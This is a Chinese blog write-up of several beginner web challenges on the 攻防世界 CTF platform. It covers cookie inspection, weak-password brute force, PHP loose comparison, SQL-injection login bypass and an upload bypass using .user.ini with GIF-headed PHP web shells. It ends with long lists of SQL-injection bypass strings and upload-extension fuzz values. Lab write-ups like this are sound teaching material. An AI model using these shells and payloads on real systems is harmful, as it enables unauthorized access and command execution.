攻防世界Cookie,disabled_button,weak_auth,simple_php,baby_web,inget,easyupload 题目WP

最新推荐文章于 2024-06-30 09:33:41 发布
最新推荐文章于 2024-06-30 09:33:41 发布
阅读量694 收藏 1
点赞数
分类专栏: 渗透测试 解题WP 文章标签: 网络安全 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ambition_sec/article/details/127868564
版权

Cookie

进来之后看到主页面

 这里涉及到cookie是类似于一种用户凭证之类的东西,尝试着抓包看一下

cookie指向了一个cookie.php文件,进行访问

disabled_button

进行f12查看按钮属性

删除点击即可

weak_auth

进行密码爆破账号固定为admin

 

 密码为123456

simple_php

get方式传入一个a和b,然后判断a是否为0成立就输出一半flag(弱类型比较),使用函数is_numeric判断b中是否存在数字或数组,存在则退出,然后判断b是否大于1234大于则输出剩下一半

/?a=0asd&b=12345a

弱类型==中 1234 和1234a进行比较结果为true或者111a和111也为true

baby_web

根据提示页面看到说初始页面是哪个,基本上是index.php了访问之后发现立即跳转到了1.php也买你,抓包进行仔细观察

 flag被隐藏,查看hex编码

inget

好家伙bypass绕过先输入?id=1尝试 ,不想进行手工判断,使用万能密码进行fuzz

成功了不少,万能密码放在文末 

easyupload

 

是一个文件上传,先上传一个png文件成功,然后判断是否为黑名单上传一个txt文件也成功了,目测应该是黑名单判断

尝试上传php5 Phtml 等

 

进行文件上传后缀名FUZZ发现可以上传成功.htaccess,先去判断一波对方中间件 

目标为nginx中间件尝试使用.user.ini文件进行利用

可以上传,这里有个坑他对文件的Content-Type也进行了判断需要使用图片类型格式进行绕过

user.ini内容为 GIF89a
auto_prepend_file=a.png指向a.png文件当php使用

在上传a.png的时候发现会对文件内容进行检测是否有php这里可以尝试无php写马

GIF89a

 <?=eval($_GET['cmd']);?>

或者

<? system("tac /flag"); ?>

下面是万能密码

"or “a”="a
“or 1=1–
“or”=”
“or”="a'='a
“or1=1–
“or=or”
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1–
1'or'1'='1
a'or' 1=1–
a'or'1=1–
or 'a'='a'
or 1=1–
or1=1-- asp aspx "or “a”="a
'.).or.('.a.'='.a
or 1=1–
'or 1=1–
a'or' 1=1–
"or 1=1–
'or.'a.'='a
“or”="a'='a
'or''='
or'='or' jsp 1'or'1'='1
admin' or 1=1/*
"or "a"="a
'.).or.('.a.'='.a 
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or.'a.'='a
"or"="a'='a
'or''='
'or'='or'
admin'or 1=1#
admin'/*
aaaa*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
"or "a"="a
 ')or('a'='a
or 1=1¨C
'or 1=1¨C
a'or' 1=1¨C
"or 1=1¨C
'or'a'='a
"or"="a'='a
'or"='
'or'='or'
1 or '1'='1'=1
1 or '1'='1¡ä or 1=1
'OR 1=1%00
"or 1=1%00
'xor
admin' or 'a'='a
'or 1=1/*
something
'OR '1'='1
1'or'1'='
admin' OR 1=1/*
' or 1=1#
'=0#
'>-1#
'<1#
1'<99#
'=0=1#
'<=>0#
'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#
'|0#
'&0#
'^0#
'<<0#
'>>0#
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#
'*9#
'/9#
'%9#
'+0#
'-0#
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#
'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#
'=upper     (0)#
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#
'='
'<>'1
'>1='
0'='0
'<1 and 1>'
'<>ifnull(1,2)='1
'=round(0,1)='1
'*0*'
'+'
'-'
'+1-1-'
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#
' or 1=1#
' or '
' || '

下面是文件后缀名FUZZ

.jpg
.png
.gif
.php
.phtml
.PHP
.Php
.pHp
.phP
.php2
.php3
.php4
.php5
.php6
.php7
.pphphphpp
.htaccess
.php 
.php::$DATA
.php.
.php. .
.php%00.jpg

知名小朋友
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Five_State_Button_B.zip_button bitmap_show
09-24
例如,"Five State Button"可能是这五张位图文件的名称,它们可能分别命名为"normal.bmp", "hover.bmp", "pressed.bmp", "disabled.bmp"和"focused.bmp"。 接下来,我们来讨论如何在代码中实现这个功能。在许多编程...
CCeButtonST_vc2005.rar_back_button icon_ccebutton_wince button
07-14
WinCE下的按鈕類,可以很方便的實現各種各樣的按鈕,Standard button,48x48 icon button,Disabled button,Search button,Back Next button,Lamp button
easyupload(攻防世界)
m0_56107268的博客
11-15 8131
.user.ini 学习
easyupload(攻防世界
m0_70819573的博客
02-19 468
2.检测是否有文件头(GIF89a)和文件类型(content-type)的限制。1.检测是否能上传别名文件php3,php5,phtml,如不是则考虑图片马。4.考虑用.htaccess或.user.ini的系统配置文件绕过。这样这类普通题型就可以被攻克了,具体步骤参考官方write up。题目描述:一名合格的黑客眼中,所有的上传点都是开发者留下的后门。5.检测是否有文件内php内容的限制。
Easyupload攻防世界
最新发布
xyh000001的博客
06-30 446
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。把Content-Type: application/octet-stream改成。我打/直接拉到最下面有flag点进去就是答案了。上传a.jpg这样才算成功(如图)。1.新建.user.ini文件。用蚁剑连接(每个人的都不一样)上传上面的文件用BURP抓包。新建a.txt文件,内容为。保存后把文件名改成.jpg。F12打开网络找到网址。
攻防世界 easyupload
2301_79634616的博客
03-05 432
1.下载蚁剑2.应该是上传木马拿flag。
攻防世界easyupload
2302_81393479的博客
02-27 382
所以首先我们得到本地新建一个.user.ini文件和包含木马的a.jpg文件,因为木马中不能有php字符,所以一句话木马可以为<?一进来就是文件上传,但是试了一下直接传一句话木马文件没用,看其他的解题思路发现是上传的内容不能有php字符。然后上传.user.ini再用bp抓包修改content-type为image/jpg,再放包。然后就在bp放包放到下面这个a.jpg的页面出现为止,接着就再放一次包。然后页面成功回显,显示上传成功,接着就再上传a.jpg。
select-option-disabled-emulation.zip_OPTION_select option_select
09-22
select-option-disabled-emulation.js解决IE6 Select 中 option 的disabled属性无效的办法~~~在页面加载时架子该js,呵呵有点问题:onchange 时间冲突 自己改改··
UPGDSED-1.1.2.zip_PatchGuard_UPGDSED 下载_energyjop_patchguard dis
09-21
标题中的"UPGDSED-1.1.2.zip_PatchGuard_UPGDSED 下载_energyjop_patchguard dis"提到了几个关键元素,分别是"UPGDSED"、"PatchGuard"、"energyjop"以及"disabled"。这些元素暗示了这个压缩包可能与一个名为"UPGDSED...
admintools-1.12.1-pl.transport.zip_AdminTools_On Revolution_modx
09-23
All these features can be switched Off/On by the corresponding system setting. Some features are disabled by default. A basic Extra for MODx Revolution Administrators. It adds some features:
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 644
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界easyupload
小缪的博客
06-10 3349
知识点:文件上传漏洞。
攻防世界--easyupload
qq_73611185的博客
09-16 811
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十题。
[攻防世界] easyupload
m0_75178803的博客
04-02 619
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
攻防世界-easyupload
m0_49025459的博客
12-24 291
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制。接下来,大家可看可不看,我告诉大家,我是怎么找到过滤的,又是怎么发现是.user.ini的,我拿到题一点头绪没有,但是这几天做题,我发现我有一个一句话木马的总结,刚好被我试出来了。题如其名,文件上传的形式,那么我先把正常的上传步骤告诉大家,然后我再说我是怎么做的。
攻防世界--WEB--easyupload
m0_65766842的博客
03-30 321
但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头。因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项。连接成功之后,我们在根目录下发现了flag文件,打开得到flag。此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。先传user.ini再传a.jpg。
攻防世界disabled_button
07-27
对于"disabled_button"的攻击和防御,以下是一些可能的措施: 攻击: 1. 用户端注入攻击:攻击者可能尝试通过修改用户端代码来绕过按钮禁用功能。为了防止这种攻击,应该在服务端进行输入验证和安全性检查,并在用户端使用合适的安全控件。 2. 脚本注入攻击:攻击者可能尝试通过向输入字段注入恶意脚本来绕过按钮禁用功能。为了防止这种攻击,应该对输入进行严格的过滤和转义,确保用户输入不会被当作代码执行。 防御: 1. 服务端验证:在接收到用户请求时,服务端应该对请求进行验证,确保用户具有执行相应操作的权限。如果用户没有权限执行操作,服务器应该返回错误信息,并阻止操作的执行。 2. 前端控制:在前端页面中,可以使用JavaScript等技术来禁用按钮。通过设置按钮的disabled属性,可以防止用户通过点击按钮来触发操作。同时,还可以通过合适的前端框架或库来进行表单验证,确保用户输入的有效性。 3. 输入过滤和转义:在接收用户输入时,应该对输入进行过滤和转义,以防止恶意脚本注入攻击。可以使用合适的编程语言或库来进行输入验证和处理,确保用户输入的安全性。 需要注意的是,以上只是一些常见的防御措施,具体的实施方法和技术取决于具体的应用场景和开发环境。在开发过程中,应该结合具体的需求和安全威胁来选择合适的防御策略。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值